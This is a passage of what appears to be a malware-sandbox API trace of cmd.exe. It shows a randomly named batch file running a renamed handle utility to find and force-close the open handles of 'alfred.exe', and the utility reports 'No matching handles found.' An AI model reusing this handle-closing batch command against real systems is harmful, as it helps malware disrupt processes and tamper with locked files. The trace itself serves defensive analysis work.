hConsoleHandle=0x3c, lpMode=0xfced14 | out: lpMode=0xfced14) returned 1 [0211.973] _get_osfhandle (_FileHandle=1) returned 0x3c [0211.973] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x13f9be0*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0xfced2c, lpReserved=0x0 | out: lpBuffer=0x13f9be0*, lpNumberOfCharsWritten=0xfced2c*=0x1e) returned 1 [0211.974] _get_osfhandle (_FileHandle=1) returned 0x3c [0211.974] GetFileType (hFile=0x3c) returned 0x2 [0211.974] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0211.974] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xfcefb4 | out: lpMode=0xfcefb4) returned 1 [0211.974] _get_osfhandle (_FileHandle=1) returned 0x3c [0211.974] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x12683e0*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xfcefcc, lpReserved=0x0 | out: lpBuffer=0x12683e0*, lpNumberOfCharsWritten=0xfcefcc*=0x2) returned 1 [0211.974] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xfcefd4 | out: _Buffer=" /d \"C:\\Users\\CIiHmnxMn6Ps\\Desktop\\\" ") returned 37 [0211.974] _get_osfhandle (_FileHandle=1) returned 0x3c [0211.974] GetFileType (hFile=0x3c) returned 0x2 [0211.974] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0211.974] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xfcefac | out: lpMode=0xfcefac) returned 1 [0211.974] _get_osfhandle (_FileHandle=1) returned 0x3c [0211.974] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x25, lpNumberOfCharsWritten=0xfcefc4, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0xfcefc4*=0x25) returned 1 [0211.975] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xfcefe8 | out: _Buffer="\r\n") returned 2 [0211.975] _get_osfhandle (_FileHandle=1) returned 0x3c [0211.975] GetFileType (hFile=0x3c) returned 0x2 [0211.975] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0211.975] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xfcefc0 | out: lpMode=0xfcefc0) returned 1 [0211.975] _get_osfhandle (_FileHandle=1) returned 0x3c [0211.975] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xfcefd8, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0xfcefd8*=0x2) returned 1 [0211.975] _wcsicmp (_String1="cd", _String2="DIR") returned -1 [0211.975] _wcsicmp (_String1="cd", _String2="ERASE") returned -2 [0211.975] _wcsicmp (_String1="cd", _String2="DEL") returned -1 [0211.975] _wcsicmp (_String1="cd", _String2="TYPE") returned -17 [0211.975] _wcsicmp (_String1="cd", _String2="COPY") returned -11 [0211.975] _wcsicmp (_String1="cd", _String2="CD") returned 0 [0211.975] GetConsoleTitleW (in: lpConsoleTitle=0xfceb58, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0211.976] _wcsicmp (_String1="cd", _String2="DIR") returned -1 [0211.976] _wcsicmp (_String1="cd", _String2="ERASE") returned -2 [0211.976] _wcsicmp (_String1="cd", _String2="DEL") returned -1 [0211.976] _wcsicmp (_String1="cd", _String2="TYPE") returned -17 [0211.976] _wcsicmp (_String1="cd", _String2="COPY") returned -11 [0211.976] _wcsicmp (_String1="cd", _String2="CD") returned 0 [0211.976] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0211.976] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0211.976] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0xfce910, nVolumeNameSize=0x104, lpVolumeSerialNumber=0xfce908, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0xfce908*=0xd2ca4def, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0211.976] _wcsnicmp (_String1="/d", _String2="/D", _MaxCount=0x2) returned 0 [0211.976] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0xfce6b4 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0211.976] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\", nBufferLength=0x104, lpBuffer=0xfce6b4, lpFilePart=0xfce6ac | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\", lpFilePart=0xfce6ac*=0x0) returned 0x1e [0211.976] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 0x11 [0211.976] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0xfce430 | out: lpFindFileData=0xfce430) returned 0x1259ee0 [0211.977] FindClose (in: hFindFile=0x1259ee0 | out: hFindFile=0x1259ee0) returned 1 [0211.977] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps", lpFindFileData=0xfce430 | out: lpFindFileData=0xfce430) returned 0x1259ee0 [0211.977] FindClose (in: hFindFile=0x1259ee0 | out: hFindFile=0x1259ee0) returned 1 [0211.977] _wcsnicmp (_String1="CIIHMN~1", _String2="CIiHmnxMn6Ps", _MaxCount=0xc) returned 6 [0211.977] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFindFileData=0xfce430 | out: lpFindFileData=0xfce430) returned 0x1259ee0 [0211.977] FindClose (in: hFindFile=0x1259ee0 | out: hFindFile=0x1259ee0) returned 1 [0211.977] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 0x11 [0211.977] SetCurrentDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 1 [0211.977] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 1 [0211.977] GetEnvironmentStringsW () returned 0x125cdc8* [0211.977] FreeEnvironmentStringsA (penv="=") returned 1 [0211.977] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1406720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0211.977] _get_osfhandle (_FileHandle=1) returned 0x3c [0211.977] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0211.977] _get_osfhandle (_FileHandle=1) returned 0x3c [0211.977] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x13fe40c | out: lpMode=0x13fe40c) returned 1 [0211.978] _get_osfhandle (_FileHandle=0) returned 0x38 [0211.978] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x13fe408 | out: lpMode=0x13fe408) returned 1 [0211.978] SetConsoleInputExeNameW () returned 0x1 [0211.978] GetConsoleOutputCP () returned 0x1b5 [0211.978] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x13fe460 | out: lpCPInfo=0x13fe460) returned 1 [0211.978] SetThreadUILanguage (LangId=0x0) returned 0x409 [0211.978] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\vrnqnmbw.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0xfcefa4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0211.978] _open_osfhandle (_OSFileHandle=0xb0, _Flags=8) returned 3 [0211.978] _get_osfhandle (_FileHandle=3) returned 0xb0 [0211.978] SetFilePointer (in: hFile=0xb0, lDistanceToMove=78, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x4e [0211.979] _get_osfhandle (_FileHandle=3) returned 0xb0 [0211.979] SetFilePointer (in: hFile=0xb0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4e [0211.979] ReadFile (in: hFile=0xb0, lpBuffer=0x140a960, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0xfcef74, lpOverlapped=0x0 | out: lpBuffer=0x140a960*, lpNumberOfBytesRead=0xfcef74*=0x94, lpOverlapped=0x0) returned 1 [0211.979] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x140a960, cbMultiByte=148, lpWideCharStr=0x13f57e0, cchWideChar=8191 | out: lpWideCharStr="FOR /F \"UseBackQ Tokens=3,6 delims=: \" %%I IN (`vIDhS3md.exe -accepteula %FN% -nobanner`) DO (vIDhS3md.exe -accepteula -c %%J -y -p %%I -nobanner)\r\n") returned 148 [0211.979] _get_osfhandle (_FileHandle=3) returned 0xb0 [0211.979] GetFileType (hFile=0xb0) returned 0x1 [0211.979] _get_osfhandle (_FileHandle=3) returned 0xb0 [0211.979] SetFilePointer (in: hFile=0xb0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xe2 [0211.979] GetEnvironmentVariableW (in: lpName="FN", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="\"alfred.exe\"") returned 0xc [0211.980] _wcsicmp (_String1="FOR", _String2=")") returned 61 [0211.980] _wcsicmp (_String1="FOR", _String2="FOR") returned 0 [0211.980] _wcsicmp (_String1="FOR/?", _String2="FOR") returned 47 [0211.980] _wcsicmp (_String1="/L", _String2="/F") returned 6 [0211.980] _wcsicmp (_String1="/D", _String2="/F") returned -2 [0211.980] _wcsicmp (_String1="/F", _String2="/F") returned 0 [0211.980] _wcsicmp (_String1="/L", _String2="%I") returned 10 [0211.980] _wcsicmp (_String1="/D", _String2="%I") returned 10 [0211.980] _wcsicmp (_String1="/F", _String2="%I") returned 10 [0211.980] _wcsicmp (_String1="/R", _String2="%I") returned 10 [0211.981] _wcsicmp (_String1="IN", _String2="IN") returned 0 [0211.981] _wcsicmp (_String1="DO", _String2="DO") returned 0 [0211.981] _wcsicmp (_String1="FOR", _String2="vIDhS3md.exe") returned -16 [0211.981] _wcsicmp (_String1="FOR/?", _String2="vIDhS3md.exe") returned -16 [0211.981] _wcsicmp (_String1="IF", _String2="vIDhS3md.exe") returned -13 [0211.981] _wcsicmp (_String1="IF/?", _String2="vIDhS3md.exe") returned -13 [0211.981] _wcsicmp (_String1="REM", _String2="vIDhS3md.exe") returned -4 [0211.981] _wcsicmp (_String1="REM/?", _String2="vIDhS3md.exe") returned -4 [0211.982] _tell (_FileHandle=3) returned 226 [0211.982] _close (_FileHandle=3) returned 0 [0211.982] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xfced38 | out: _Buffer="\r\n") returned 2 [0211.982] _get_osfhandle (_FileHandle=1) returned 0x3c [0211.982] GetFileType (hFile=0x3c) returned 0x2 [0211.982] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0211.982] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xfced10 | out: lpMode=0xfced10) returned 1 [0211.983] _get_osfhandle (_FileHandle=1) returned 0x3c [0211.983] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xfced28, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0xfced28*=0x2) returned 1 [0211.983] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0211.983] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1406720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0211.983] _vsnwprintf (in: _Buffer=0x13f9be0, _BufferCount=0x3fe, _Format="%s", _ArgList=0xfced34 | out: _Buffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 29 [0211.983] _vsnwprintf (in: _Buffer=0x13f9c1a, _BufferCount=0x3e1, _Format="%c", _ArgList=0xfced34 | out: _Buffer=">") returned 1 [0211.983] _get_osfhandle (_FileHandle=1) returned 0x3c [0211.983] GetFileType (hFile=0x3c) returned 0x2 [0211.983] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0211.983] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xfced14 | out: lpMode=0xfced14) returned 1 [0211.983] _get_osfhandle (_FileHandle=1) returned 0x3c [0211.983] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x13f9be0*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0xfced2c, lpReserved=0x0 | out: lpBuffer=0x13f9be0*, lpNumberOfCharsWritten=0xfced2c*=0x1e) returned 1 [0211.984] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format="%.3s", _ArgList=0xfcefd4 | out: _Buffer="FOR") returned 3 [0211.984] _get_osfhandle (_FileHandle=1) returned 0x3c [0211.984] GetFileType (hFile=0x3c) returned 0x2 [0211.984] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0211.984] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xfcefac | out: lpMode=0xfcefac) returned 1 [0211.984] _get_osfhandle (_FileHandle=1) returned 0x3c [0211.984] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xfcefc4, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0xfcefc4*=0x3) returned 1 [0211.984] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format=" %s", _ArgList=0xfcefd4 | out: _Buffer=" /F") returned 3 [0211.984] _get_osfhandle (_FileHandle=1) returned 0x3c [0211.984] GetFileType (hFile=0x3c) returned 0x2 [0211.984] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0211.984] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xfcefac | out: lpMode=0xfcefac) returned 1 [0211.985] _get_osfhandle (_FileHandle=1) returned 0x3c [0211.985] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xfcefc4, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0xfcefc4*=0x3) returned 1 [0211.985] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format=" %s", _ArgList=0xfcefd4 | out: _Buffer=" \"UseBackQ Tokens=3,6 delims=: \"") returned 32 [0211.985] _get_osfhandle (_FileHandle=1) returned 0x3c [0211.985] GetFileType (hFile=0x3c) returned 0x2 [0211.985] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0211.985] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xfcefac | out: lpMode=0xfcefac) returned 1 [0211.985] _get_osfhandle (_FileHandle=1) returned 0x3c [0211.985] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x20, lpNumberOfCharsWritten=0xfcefc4, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0xfcefc4*=0x20) returned 1 [0211.985] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format=" %s ", _ArgList=0xfcefd4 | out: _Buffer=" %I IN ") returned 7 [0211.986] _get_osfhandle (_FileHandle=1) returned 0x3c [0211.986] GetFileType (hFile=0x3c) returned 0x2 [0211.986] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0211.986] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xfcefac | out: lpMode=0xfcefac) returned 1 [0211.986] _get_osfhandle (_FileHandle=1) returned 0x3c [0211.986] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x7, lpNumberOfCharsWritten=0xfcefc4, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0xfcefc4*=0x7) returned 1 [0211.986] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format="(%s) %s ", _ArgList=0xfcefd0 | out: _Buffer="(`vIDhS3md.exe -accepteula \"alfred.exe\" -nobanner`) DO ") returned 55 [0211.986] _get_osfhandle (_FileHandle=1) returned 0x3c [0211.986] GetFileType (hFile=0x3c) returned 0x2 [0211.986] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0211.986] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xfcefa8 | out: lpMode=0xfcefa8) returned 1 [0211.986] _get_osfhandle (_FileHandle=1) returned 0x3c [0211.986] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x37, lpNumberOfCharsWritten=0xfcefc0, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0xfcefc0*=0x37) returned 1 [0211.987] _get_osfhandle (_FileHandle=1) returned 0x3c [0211.987] GetFileType (hFile=0x3c) returned 0x2 [0211.987] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0211.987] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xfcefb4 | out: lpMode=0xfcefb4) returned 1 [0211.987] _get_osfhandle (_FileHandle=1) returned 0x3c [0211.987] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x13d2318*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0xfcefcc, lpReserved=0x0 | out: lpBuffer=0x13d2318*, lpNumberOfCharsWritten=0xfcefcc*=0x1) returned 1 [0211.987] _get_osfhandle (_FileHandle=1) returned 0x3c [0211.987] GetFileType (hFile=0x3c) returned 0x2 [0211.987] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0211.987] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xfcefa4 | out: lpMode=0xfcefa4) returned 1 [0211.988] _get_osfhandle (_FileHandle=1) returned 0x3c [0211.988] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1250e18*, nNumberOfCharsToWrite=0xc, lpNumberOfCharsWritten=0xfcefbc, lpReserved=0x0 | out: lpBuffer=0x1250e18*, lpNumberOfCharsWritten=0xfcefbc*=0xc) returned 1 [0211.988] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xfcefc4 | out: _Buffer=" -accepteula -c %J -y -p %I -nobanner ") returned 38 [0211.988] _get_osfhandle (_FileHandle=1) returned 0x3c [0211.988] GetFileType (hFile=0x3c) returned 0x2 [0211.988] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0211.988] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xfcef9c | out: lpMode=0xfcef9c) returned 1 [0211.988] _get_osfhandle (_FileHandle=1) returned 0x3c [0211.988] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x26, lpNumberOfCharsWritten=0xfcefb4, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0xfcefb4*=0x26) returned 1 [0211.989] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xfcefd4 | out: _Buffer=") ") returned 2 [0211.989] _get_osfhandle (_FileHandle=1) returned 0x3c [0211.989] GetFileType (hFile=0x3c) returned 0x2 [0211.989] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0211.989] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xfcefac | out: lpMode=0xfcefac) returned 1 [0211.989] _get_osfhandle (_FileHandle=1) returned 0x3c [0211.989] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xfcefc4, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0xfcefc4*=0x2) returned 1 [0211.989] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xfcefe8 | out: _Buffer="\r\n") returned 2 [0211.989] _get_osfhandle (_FileHandle=1) returned 0x3c [0211.989] GetFileType (hFile=0x3c) returned 0x2 [0211.989] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0211.989] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xfcefc0 | out: lpMode=0xfcefc0) returned 1 [0211.989] _get_osfhandle (_FileHandle=1) returned 0x3c [0211.989] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xfcefd8, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0xfcefd8*=0x2) returned 1 [0211.990] _wcsnicmp (_String1="UseBackQ", _String2="usebackq", _MaxCount=0x8) returned 0 [0211.990] _wcsnicmp (_String1="Tokens=3", _String2="usebackq", _MaxCount=0x8) returned -1 [0211.990] _wcsnicmp (_String1="Tokens=", _String2="useback", _MaxCount=0x7) returned -1 [0211.990] _wcsnicmp (_String1="Toke", _String2="eol=", _MaxCount=0x4) returned 15 [0211.990] _wcsnicmp (_String1="Tokens=", _String2="delims=", _MaxCount=0x7) returned 16 [0211.990] _wcsnicmp (_String1="Token", _String2="skip=", _MaxCount=0x5) returned 1 [0211.990] _wcsnicmp (_String1="Tokens=", _String2="tokens=", _MaxCount=0x7) returned 0 [0211.990] wcstol (in: _String="3,6 delims=: \"", _EndPtr=0xfcef10, _Radix=0 | out: _EndPtr=0xfcef10*=",6 delims=: \"") returned 3 [0211.990] wcstol (in: _String="6 delims=: \"", _EndPtr=0xfcef10, _Radix=0 | out: _EndPtr=0xfcef10*=" delims=: \"") returned 6 [0211.990] _wcsnicmp (_String1="delims=:", _String2="usebackq", _MaxCount=0x8) returned -17 [0211.990] _wcsnicmp (_String1="delims=", _String2="useback", _MaxCount=0x7) returned -17 [0211.990] _wcsnicmp (_String1="deli", _String2="eol=", _MaxCount=0x4) returned -1 [0211.990] _wcsnicmp (_String1="delims=", _String2="delims=", _MaxCount=0x7) returned 0 [0211.990] _wpopen (_Command="vIDhS3md.exe -accepteula \"alfred.exe\" -nobanner", _Mode="rb") returned 0x77981268 [0211.998] feof (_File=0x77981268) returned 0 [0211.998] ferror (_File=0x77981268) returned 0 [0211.998] fgets (in: _Buf=0x125a5f0, _MaxCount=256, _File=0x77981268 | out: _Buf="No matching handles found.\r\r\n", _File=0x77981268) returned="No matching handles found.\r\r\n" [0267.838] feof (_File=0x77981268) returned 0 [0267.838] ferror (_File=0x77981268) returned 0 [0267.838] fgets (in: _Buf=0x125a60d, _MaxCount=483, _File=0x77981268 | out: _Buf="", _File=0x77981268) returned 0x0 [0273.495] _pclose (in: _File=0x77981268 | out: _File=0x77981268) returned 0 [0273.496] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x125a60d, cbMultiByte=29, lpWideCharStr=0x125a5f0, cchWideChar=29 | out: lpWideCharStr="No matching handles found.\r\r\n") returned 29 [0273.497] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xfcebf0 | out: _Buffer="\r\n") returned 2 [0273.497] _get_osfhandle (_FileHandle=1) returned 0x3c [0273.497] GetFileType (hFile=0x3c) returned 0x2 [0273.497] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0273.497] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xfcebc8 | out: lpMode=0xfcebc8) returned 1 [0273.524] _get_osfhandle (_FileHandle=1) returned 0x3c [0273.524] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xfcebe0, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0xfcebe0*=0x2) returned 1 [0273.524] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1406720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0273.524] _vsnwprintf (in: _Buffer=0x13f9be0, _BufferCount=0x3fe, _Format="%s", _ArgList=0xfcebec | out: _Buffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 29 [0273.524] _vsnwprintf (in: _Buffer=0x13f9c1a, _BufferCount=0x3e1, _Format="%c", _ArgList=0xfcebec | out: _Buffer=">") returned 1 [0273.524] _get_osfhandle (_FileHandle=1) returned 0x3c [0273.524] GetFileType (hFile=0x3c) returned 0x2 [0273.524] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0273.524] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xfcebcc | out: lpMode=0xfcebcc) returned 1 [0273.524] _get_osfhandle (_FileHandle=1) returned 0x3c [0273.525] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x13f9be0*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0xfcebe4, lpReserved=0x0 | out: lpBuffer=0x13f9be0*, lpNumberOfCharsWritten=0xfcebe4*=0x1e) returned 1 [0273.525] _get_osfhandle (_FileHandle=1) returned 0x3c [0273.525] GetFileType (hFile=0x3c) returned 0x2 [0273.525] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0273.525] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xfcee6c | out: lpMode=0xfcee6c) returned 1 [0273.525] _get_osfhandle (_FileHandle=1) returned 0x3c [0273.525] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x13d2318*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0xfcee84, lpReserved=0x0 | out: lpBuffer=0x13d2318*, lpNumberOfCharsWritten=0xfcee84*=0x1) returned 1 [0273.525] _get_osfhandle (_FileHandle=1) returned 0x3c [0273.525] GetFileType (hFile=0x3c) returned 0x2 [0273.525] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0273.525] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xfcee5c | out: lpMode=0xfcee5c) returned 1 [0273.525] _get_osfhandle (_FileHandle=1) returned 0x3c [0273.526] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1268590*, nNumberOfCharsToWrite=0xc, lpNumberOfCharsWritten=0xfcee74, lpReserved=0x0 | out: lpBuffer=0x1268590*, lpNumberOfCharsWritten=0xfcee74*=0xc) returned 1 [0273.526] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xfcee7c | out: _Buffer=" -accepteula -c -y -p handles -nobanner ") returned 41 [0273.526] _get_osfhandle (_FileHandle=1) returned 0x3c [0273.526] GetFileType (hFile=0x3c) returned 0x2 [0273.526] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0273.526] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xfcee54 | out: lpMode=0xfcee54) returned 1 [0273.526] _get_osfhandle (_FileHandle=1) returned 0x3c [0273.526] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x29, lpNumberOfCharsWritten=0xfcee6c, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0xfcee6c*=0x29) returned 1 [0273.526] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xfcee8c | out: _Buffer=") ") returned 2 [0273.526] _get_osfhandle (_FileHandle=1) returned 0x3c [0273.526] GetFileType (hFile=0x3c) returned 0x2 [0273.526] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0273.526] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xfcee64 | out: lpMode=0xfcee64) returned 1 [0273.527] _get_osfhandle (_FileHandle=1) returned 0x3c [0273.527] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xfcee7c, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0xfcee7c*=0x2) returned 1 [0273.527] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xfceea0 | out: _Buffer="\r\n") returned 2 [0273.527] _get_osfhandle (_FileHandle=1) returned 0x3c [0273.527] GetFileType (hFile=0x3c) returned 0x2 [0273.527] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0273.527] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xfcee78 | out: lpMode=0xfcee78) returned 1 [0273.527] _get_osfhandle (_FileHandle=1) returned 0x3c [0273.527] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xfcee90, lpReserved=0x0 | out: lpBuffer=0x1406940*, 